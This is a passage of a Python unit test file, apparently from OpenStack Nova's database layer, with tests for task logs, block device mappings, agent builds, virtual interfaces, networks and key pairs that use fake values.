def test_task_log_begin_task(self):
db.task_log_begin_task(self.context, 'fake', self.begin,
self.end, self.host, task_items=42,
message=self.message)
result = db.task_log_get(self.context, 'fake', self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], 'fake')
def test_task_log_begin_task_duplicate(self):
params = (self.context, 'fake', self.begin, self.end, self.host)
db.task_log_begin_task(*params, message=self.message)
self.assertRaises(exception.TaskAlreadyRunning,
db.task_log_begin_task,
*params, message=self.message)
def test_task_log_end_task(self):
errors = 1
db.task_log_end_task(self.context, self.task_name, self.begin,
self.end, self.host, errors, message=self.message)
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['errors'], 1)
def test_task_log_end_task_task_not_running(self):
self.assertRaises(exception.TaskNotRunning,
db.task_log_end_task, self.context, 'nonexistent',
self.begin, self.end, self.host, 42,
message=self.message)
class BlockDeviceMappingTestCase(test.TestCase):
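    """Tests for db.api.block_device_mapping_* methods."""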
def setUp(self):
super(BlockDeviceMappingTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def _create_bdm(self, values):
values.setdefault('instance_uuid', self.instance['uuid'])
values.setdefault('device_name', 'fake_device')
values.setdefault('source_type', 'volume')
values.setdefault('destination_type', 'volume')
block_dev = block_device.BlockDeviceDict(values)
db.block_device_mapping_create(self.ctxt, block_dev, legacy=False)
uuid = block_dev['instance_uuid']
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
for bdm in bdms:
if bdm['device_name'] == values['device_name']:
return bdm
def test_scrub_empty_str_values_no_effect(self):
values = {'volume_size': 5}
expected = copy.copy(values)
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, expected)
def test_scrub_empty_str_values_empty_string(self):
values = {'volume_size': ''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_scrub_empty_str_values_empty_unicode(self):
values = {'volume_size': u''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_block_device_mapping_create(self):
bdm = self._create_bdm({})
self.assertIsNotNone(bdm)
def test_block_device_mapping_update(self):
bdm = self._create_bdm({})
result = db.block_device_mapping_update(
self.ctxt, bdm['id'], {'destination_type': 'moon'},
legacy=False)
uuid = bdm['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(bdm_real[0]['destination_type'], 'moon')
# Also make sure the update call returned correct data
self.assertEqual(dict(bdm_real[0]),
dict(result))
def test_block_device_mapping_update_or_create(self):
values = {
'instance_uuid': self.instance['uuid'],
'device_name': 'fake_name',
'source_type': 'volume',
'destination_type': 'volume'
}
# check create
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
uuid = values['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
self.assertEqual(bdm_real[0]['device_name'], 'fake_name')
# check update
values['destination_type'] = 'camelot'
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'fake_name')
self.assertEqual(bdm_real['destination_type'], 'camelot')
# check create without device_name
bdm1 = dict(values)
bdm1['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 1,
'expected 1 bdm without device_name, found %d' %
len(without_device_name))
# check create multiple devices without device_name
bdm2 = dict(values)
bdm2['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 2,
'expected 2 bdms without device_name, found %d' %
len(without_device_name))
def test_block_device_mapping_update_or_create_multiple_ephemeral(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'guest_format': 'myformat',
}
bdm1 = dict(values)
bdm1['device_name'] = '/dev/sdb'
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdm2 = dict(values)
bdm2['device_name'] = '/dev/sdc'
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdm_real = sorted(
db.block_device_mapping_get_all_by_instance(self.ctxt, uuid),
key=lambda bdm: bdm['device_name']
)
self.assertEqual(len(bdm_real), 2)
for bdm, device_name in zip(bdm_real, ['/dev/sdb', '/dev/sdc']):
self.assertEqual(bdm['device_name'], device_name)
self.assertEqual(bdm['guest_format'], 'myformat')
def test_block_device_mapping_update_or_create_check_remove_virt(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'destination_type': 'local',
'guest_format': 'swap',
}
# check that old swap bdms are deleted on create
val1 = dict(values)
val1['device_name'] = 'device1'
db.block_device_mapping_create(self.ctxt, val1, legacy=False)
val2 = dict(values)
val2['device_name'] = 'device2'
db.block_device_mapping_update_or_create(self.ctxt, val2, legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'device2')
self.assertEqual(bdm_real['source_type'], 'blank')
self.assertEqual(bdm_real['guest_format'], 'swap')
db.block_device_mapping_destroy(self.ctxt, bdm_real['id'])
def test_block_device_mapping_get_all_by_instance(self):
uuid1 = self.instance['uuid']
uuid2 = db.instance_create(self.ctxt, {})['uuid']
bmds_values = [{'instance_uuid': uuid1,
'device_name': '/dev/vda'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdb'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdc'}]
for bdm in bmds_values:
self._create_bdm(bdm)
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid1)
self.assertEqual(len(bmd), 1)
self.assertEqual(bmd[0]['device_name'], '/dev/vda')
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid2)
self.assertEqual(len(bmd), 2)
def test_block_device_mapping_destroy(self):
bdm = self._create_bdm({})
db.block_device_mapping_destroy(self.ctxt, bdm['id'])
bdm = db.block_device_mapping_get_all_by_instance(self.ctxt,
bdm['instance_uuid'])
self.assertEqual(len(bdm), 0)
def test_block_device_mapping_destroy_by_instance_and_volume(self):
vol_id1 = '69f5c254-1a5b-4fff-acf7-cb369904f58f'
vol_id2 = '69f5c254-1a5b-4fff-acf7-cb369904f59f'
self._create_bdm({'device_name': '/dev/vda', 'volume_id': vol_id1})
self._create_bdm({'device_name': '/dev/vdb', 'volume_id': vol_id2})
uuid = self.instance['uuid']
db.block_device_mapping_destroy_by_instance_and_volume(self.ctxt, uuid,
vol_id1)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vdb')
def test_block_device_mapping_destroy_by_instance_and_device(self):
self._create_bdm({'device_name': '/dev/vda'})
self._create_bdm({'device_name': '/dev/vdb'})
uuid = self.instance['uuid']
params = (self.ctxt, uuid, '/dev/vdb')
db.block_device_mapping_destroy_by_instance_and_device(*params)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vda')
def test_block_device_mapping_get_by_volume_id(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id')
self.assertEqual(bdm['volume_id'], 'fake_id')
def test_block_device_mapping_get_by_volume_id_join_instance(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id',
['instance'])
self.assertEqual(bdm['volume_id'], 'fake_id')
self.assertEqual(bdm['instance']['uuid'], self.instance['uuid'])
class AgentBuildTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.agent_build_* methods."""
def setUp(self):
super(AgentBuildTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_agent_build_create_and_get_all(self):
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
agent_build = db.agent_build_create(self.ctxt, {'os': 'GNU/HURD'})
all_agent_builds = db.agent_build_get_all(self.ctxt)
self.assertEqual(1, len(all_agent_builds))
self._assertEqualObjects(agent_build, all_agent_builds[0])
def test_agent_build_get_by_triple(self):
agent_build = db.agent_build_create(self.ctxt, {'hypervisor': 'kvm',
'os': 'FreeBSD', 'architecture': arch.X86_64})
self.assertIsNone(db.agent_build_get_by_triple(self.ctxt, 'kvm',
'FreeBSD', 'i386'))
self._assertEqualObjects(agent_build, db.agent_build_get_by_triple(
self.ctxt, 'kvm', 'FreeBSD', arch.X86_64))
def test_agent_build_destroy(self):
agent_build = db.agent_build_create(self.ctxt, {})
self.assertEqual(1, len(db.agent_build_get_all(self.ctxt)))
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
def test_agent_build_update(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_update(self.ctxt, agent_build.id, {'os': 'ReactOS'})
self.assertEqual('ReactOS', db.agent_build_get_all(self.ctxt)[0].os)
def test_agent_build_destroy_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_destroy, self.ctxt, agent_build.id)
def test_agent_build_update_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_update, self.ctxt, agent_build.id, {'os': 'OS/2'})
def test_agent_build_exists(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
db.agent_build_create(self.ctxt, values)
self.assertRaises(exception.AgentBuildExists, db.agent_build_create,
self.ctxt, values)
def test_agent_build_get_all_by_hypervisor(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
created = db.agent_build_create(self.ctxt, values)
actual = db.agent_build_get_all(self.ctxt, hypervisor='kvm')
self._assertEqualListsOfObjects([created], actual)
class VirtualInterfaceTestCase(test.TestCase, ModelsObjectComparatorMixin):
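    """Tests for db.api.virtual_interface_* methods."""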
def setUp(self):
super(VirtualInterfaceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance_uuid = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project1'}
self.network = db.network_create_safe(self.ctxt, values)
def _get_base_values(self):
return {
'instance_uuid': self.instance_uuid,
'address': 'fake_address',
'network_id': self.network['id'],
'uuid': str(stdlib_uuid.uuid4())
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_virt_interface(self, values):
v = self._get_base_values()
v.update(values)
return db.virtual_interface_create(self.ctxt, v)
def test_virtual_interface_create(self):
vif = self._create_virt_interface({})
self.assertIsNotNone(vif['id'])
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'uuid']
self._assertEqualObjects(vif, self._get_base_values(), ignored_keys)
def test_virtual_interface_create_with_duplicate_address(self):
vif = self._create_virt_interface({})
self.assertRaises(exception.VirtualInterfaceCreateException,
self._create_virt_interface, {"uuid": vif['uuid']})
def test_virtual_interface_get(self):
vifs = [self._create_virt_interface({'address': 'a'}),
self._create_virt_interface({'address': 'b'})]
for vif in vifs:
real_vif = db.virtual_interface_get(self.ctxt, vif['id'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address(self):
vifs = [self._create_virt_interface({'address': 'first'}),
self._create_virt_interface({'address': 'second'})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_address(self.ctxt,
vif['address'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address_not_found(self):
self.assertIsNone(db.virtual_interface_get_by_address(self.ctxt,
"i.nv.ali.ip"))
def test_virtual_interface_get_by_address_data_error_exception(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.virtual_interface_get_by_address,
self.ctxt,
"i.nv.ali.ip")
def test_virtual_interface_get_by_uuid(self):
vifs = [self._create_virt_interface({"address": "address_1"}),
self._create_virt_interface({"address": "address_2"})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_uuid(self.ctxt, vif['uuid'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
vifs1 = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2'})]
        # multiple nics of the same instance
vifs2 = [self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake4',
'instance_uuid': inst_uuid2})]
vifs1_real = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
vifs2_real = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self._assertEqualListsOfObjects(vifs1, vifs1_real)
self._assertEqualOrderedListOfObjects(vifs2, vifs2_real)
def test_virtual_interface_get_by_instance_and_network(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project2'}
network_id = db.network_create_safe(self.ctxt, values)['id']
vifs = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2',
'network_id': network_id,
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2})]
for vif in vifs:
params = (self.ctxt, vif['instance_uuid'], vif['network_id'])
r_vif = db.virtual_interface_get_by_instance_and_network(*params)
self._assertEqualObjects(r_vif, vif)
def test_virtual_interface_delete_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
for vals in values:
self._create_virt_interface(vals)
db.virtual_interface_delete_by_instance(self.ctxt, self.instance_uuid)
real_vifs1 = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
real_vifs2 = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self.assertEqual(len(real_vifs1), 0)
self.assertEqual(len(real_vifs2), 1)
def test_virtual_interface_get_all(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
vifs = [self._create_virt_interface(val) for val in values]
real_vifs = db.virtual_interface_get_all(self.ctxt)
self._assertEqualListsOfObjects(vifs, real_vifs)
class NetworkTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.network_* methods."""
def setUp(self):
super(NetworkTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_associated_fixed_ip(self, host, cidr, ip):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr})
self.assertFalse(db.network_in_use_on_host(self.ctxt, network.id,
host))
instance = db.instance_create(self.ctxt,
{'project_id': 'project1', 'host': host})
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network.id)
return network, instance
def test_network_get_associated_default_route(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': '192.0.3.0/30'})
ip = '192.0.3.1'
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network2.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network2.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network2.id)
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertTrue(data[0]['default_route'])
data = db.network_get_associated_fixed_ips(self.ctxt, network2.id)
self.assertEqual(1, len(data))
self.assertFalse(data[0]['default_route'])
def test_network_get_associated_fixed_ips(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertEqual('192.0.2.1', data[0]['address'])
self.assertEqual('192.0.2.1', data[0]['vif_address'])
self.assertEqual(instance.uuid, data[0]['instance_uuid'])
self.assertTrue(data[0]['allocated'])
def test_network_create_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(36, len(network['uuid']))
db_network = db.network_get(self.ctxt, network['id'])
self._assertEqualObjects(network, db_network)
def test_network_create_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 1}
db.network_create_safe(self.ctxt, values1)
self.assertRaises(exception.DuplicateVlan,
db.network_create_safe, self.ctxt, values2)
def test_network_delete_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
db.network_get(self.ctxt, network['id'])
values = {'network_id': network['id'], 'address': '192.168.1.5'}
address1 = db.fixed_ip_create(self.ctxt, values)['address']
values = {'network_id': network['id'],
'address': '192.168.1.6',
'allocated': True}
address2 = db.fixed_ip_create(self.ctxt, values)['address']
self.assertRaises(exception.NetworkInUse,
db.network_delete_safe, self.ctxt, network['id'])
db.fixed_ip_update(self.ctxt, address2, {'allocated': False})
network = db.network_delete_safe(self.ctxt, network['id'])
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address1)
ctxt = self.ctxt.elevated(read_deleted='yes')
fixed_ip = db.fixed_ip_get_by_address(ctxt, address1)
self.assertTrue(fixed_ip['deleted'])
def test_network_in_use_on_host(self):
values = {'host': 'foo', 'hostname': 'myname'}
instance = db.instance_create(self.ctxt, values)
values = {'address': '192.168.1.5', 'instance_uuid': instance['uuid']}
vif = db.virtual_interface_create(self.ctxt, values)
values = {'address': '192.168.1.6',
'network_id': 1,
'allocated': True,
'instance_uuid': instance['uuid'],
'virtual_interface_id': vif['id']}
db.fixed_ip_create(self.ctxt, values)
        self.assertTrue(db.network_in_use_on_host(self.ctxt, 1, 'foo'))
        self.assertFalse(db.network_in_use_on_host(self.ctxt, 1, 'bar'))
def test_network_update_nonexistent(self):
self.assertRaises(exception.NetworkNotFound,
db.network_update, self.ctxt, 123456, {})
def test_network_update_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 2}
network_ref = db.network_create_safe(self.ctxt, values1)
db.network_create_safe(self.ctxt, values2)
self.assertRaises(exception.DuplicateVlan,
db.network_update, self.ctxt,
network_ref["id"], values2)
def test_network_update(self):
network = db.network_create_safe(self.ctxt, {'project_id': 'project1',
'vlan': 1, 'host': 'test.com'})
db.network_update(self.ctxt, network.id, {'vlan': 2})
network_new = db.network_get(self.ctxt, network.id)
self.assertEqual(2, network_new.vlan)
def test_network_set_host_nonexistent_network(self):
self.assertRaises(exception.NetworkNotFound, db.network_set_host,
self.ctxt, 123456, 'nonexistent')
def test_network_set_host_already_set_correct(self):
values = {'host': 'example.com', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertIsNone(db.network_set_host(self.ctxt, network.id,
'example.com'))
def test_network_set_host_already_set_incorrect(self):
values = {'host': 'example.com', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertIsNone(db.network_set_host(self.ctxt, network.id,
'new.example.com'))
def test_network_set_host_with_initially_no_host(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
db.network_set_host(self.ctxt, network.id, 'example.com')
self.assertEqual('example.com',
db.network_get(self.ctxt, network.id).host)
def test_network_set_host_succeeds_retry_on_deadlock(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
def fake_update(params):
if mock_update.call_count == 1:
raise db_exc.DBDeadlock()
else:
return 1
with mock.patch('sqlalchemy.orm.query.Query.update',
side_effect=fake_update) as mock_update:
db.network_set_host(self.ctxt, network.id, 'example.com')
self.assertEqual(2, mock_update.call_count)
def test_network_set_host_succeeds_retry_on_no_rows_updated(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
def fake_update(params):
if mock_update.call_count == 1:
return 0
else:
return 1
with mock.patch('sqlalchemy.orm.query.Query.update',
side_effect=fake_update) as mock_update:
db.network_set_host(self.ctxt, network.id, 'example.com')
self.assertEqual(2, mock_update.call_count)
def test_network_set_host_failed_with_retry_on_no_rows_updated(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
with mock.patch('sqlalchemy.orm.query.Query.update',
return_value=0) as mock_update:
self.assertRaises(exception.NetworkSetHostFailed,
db.network_set_host, self.ctxt, network.id,
'example.com')
# 5 retries + initial attempt
self.assertEqual(6, mock_update.call_count)
def test_network_get_all_by_host(self):
self.assertEqual([],
db.network_get_all_by_host(self.ctxt, 'example.com'))
host = 'h1.example.com'
# network with host set
net1 = db.network_create_safe(self.ctxt, {'host': host})
self._assertEqualListsOfObjects([net1],
db.network_get_all_by_host(self.ctxt, host))
# network with fixed ip with host set
net2 = db.network_create_safe(self.ctxt, {})
db.fixed_ip_create(self.ctxt, {'host': host, 'network_id': net2.id})
db.network_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_host(self.ctxt, host))
# network with instance with host set
net3 = db.network_create_safe(self.ctxt, {})
instance = db.instance_create(self.ctxt, {'host': host})
db.fixed_ip_create(self.ctxt, {'network_id': net3.id,
'instance_uuid': instance.uuid})
self._assertEqualListsOfObjects([net1, net2, net3],
db.network_get_all_by_host(self.ctxt, host))
def test_network_get_by_cidr(self):
cidr = '192.0.2.0/30'
cidr_v6 = '2001:db8:1::/64'
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr, 'cidr_v6': cidr_v6})
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr))
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr_v6))
def test_network_get_by_cidr_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForCidr,
db.network_get_by_cidr, self.ctxt, '192.0.2.0/30')
def test_network_get_by_uuid(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project_1'})
self._assertEqualObjects(network,
db.network_get_by_uuid(self.ctxt, network.uuid))
def test_network_get_by_uuid_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForUUID,
db.network_get_by_uuid, self.ctxt, 'non-existent-uuid')
def test_network_get_all_by_uuids_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all_by_uuids, self.ctxt, ['non-existent-uuid'])
def test_network_get_all_by_uuids(self):
net1 = db.network_create_safe(self.ctxt, {})
net2 = db.network_create_safe(self.ctxt, {})
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_uuids(self.ctxt, [net1.uuid, net2.uuid]))
def test_network_get_all_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all, self.ctxt)
def test_network_get_all(self):
network = db.network_create_safe(self.ctxt, {})
network_db = db.network_get_all(self.ctxt)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network, network_db[0])
def test_network_get_all_admin_user(self):
network1 = db.network_create_safe(self.ctxt, {})
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1'})
self._assertEqualListsOfObjects([network1, network2],
db.network_get_all(self.ctxt,
project_only=True))
def test_network_get_all_normal_user(self):
normal_ctxt = context.RequestContext('fake', 'fake')
db.network_create_safe(self.ctxt, {})
db.network_create_safe(self.ctxt, {'project_id': 'project1'})
network1 = db.network_create_safe(self.ctxt,
{'project_id': 'fake'})
network_db = db.network_get_all(normal_ctxt, project_only=True)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network1, network_db[0])
def test_network_get(self):
network = db.network_create_safe(self.ctxt, {})
self._assertEqualObjects(db.network_get(self.ctxt, network.id),
network)
db.network_delete_safe(self.ctxt, network.id)
self.assertRaises(exception.NetworkNotFound,
db.network_get, self.ctxt, network.id)
def test_network_associate(self):
network = db.network_create_safe(self.ctxt, {})
self.assertIsNone(network.project_id)
db.network_associate(self.ctxt, "project1", network.id)
self.assertEqual("project1", db.network_get(self.ctxt,
network.id).project_id)
    def test_network_disassociate(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'host': 'test.net'})
# disassociate project
db.network_disassociate(self.ctxt, network.id, False, True)
self.assertIsNone(db.network_get(self.ctxt, network.id).project_id)
# disassociate host
db.network_disassociate(self.ctxt, network.id, True, False)
self.assertIsNone(db.network_get(self.ctxt, network.id).host)
def test_network_count_reserved_ips(self):
net = db.network_create_safe(self.ctxt, {})
self.assertEqual(0, db.network_count_reserved_ips(self.ctxt, net.id))
db.fixed_ip_create(self.ctxt, {'network_id': net.id,
'reserved': True})
self.assertEqual(1, db.network_count_reserved_ips(self.ctxt, net.id))
class KeyPairTestCase(test.TestCase, ModelsObjectComparatorMixin):
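    """Tests for db.api.key_pair_* methods."""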
def setUp(self):
super(KeyPairTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_key_pair(self, values):
return db.key_pair_create(self.ctxt, values)
def test_key_pair_create(self):
param = {
'name': 'test_1',
'type': 'ssh',
'user_id': 'test_user_id_1',
'public_key': 'test_public_key_1',
'fingerprint': 'test_fingerprint_1'
}
key_pair = self._create_key_pair(param)
self.assertIsNotNone(key_pair['id'])
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(key_pair, param, ignored_keys)
def test_key_pair_create_with_duplicate_name(self):
params = {'name': 'test_name', 'user_id': 'test_user_id',
'type': 'ssh'}
self._create_key_pair(params)
self.assertRaises(exception.KeyPairExists, self._create_key_pair,
params)
def test_key_pair_get(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_2', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_3', 'type': 'ssh'}
]
key_pairs = [self._create_key_pair(p) for p in params]
for key in key_pairs:
real_key = db.key_pair_get(self.ctxt, key['user_id'], key['name'])
self._assertEqualObjects(key, real_key)
def test_key_pair_get_no_results(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_get_deleted(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
key_pair_created = self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
ctxt = self.ctxt.elevated(read_deleted='yes')
key_pair_deleted = db.key_pair_get(ctxt, param['user_id'],
param['name'])
ignored_keys = ['deleted', 'created_at', 'updated_at', 'deleted_at']
self._assertEqualObjects(key_pair_deleted, key_pair_created,
ignored_keys)
self.assertEqual(key_pair_deleted['deleted'], key_pair_deleted['id'])
def test_key_pair_get_all_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
key_pairs_user_1 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_1']
key_pairs_user_2 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_2']
real_keys_1 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_1')
real_keys_2 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_2')
self._assertEqualListsOfObjects(key_pairs_user_1, real_keys_1)
self._assertEqualListsOfObjects(key_pairs_user_2, real_keys_2)
def test_key_pair_count_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
for p in params:
self._create_key_pair(p)
count_1 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_1')
self.assertEqual(count_1, 2)
count_2 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_2')
self.assertEqual(count_2, 1)
def test_key_pair_destroy(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
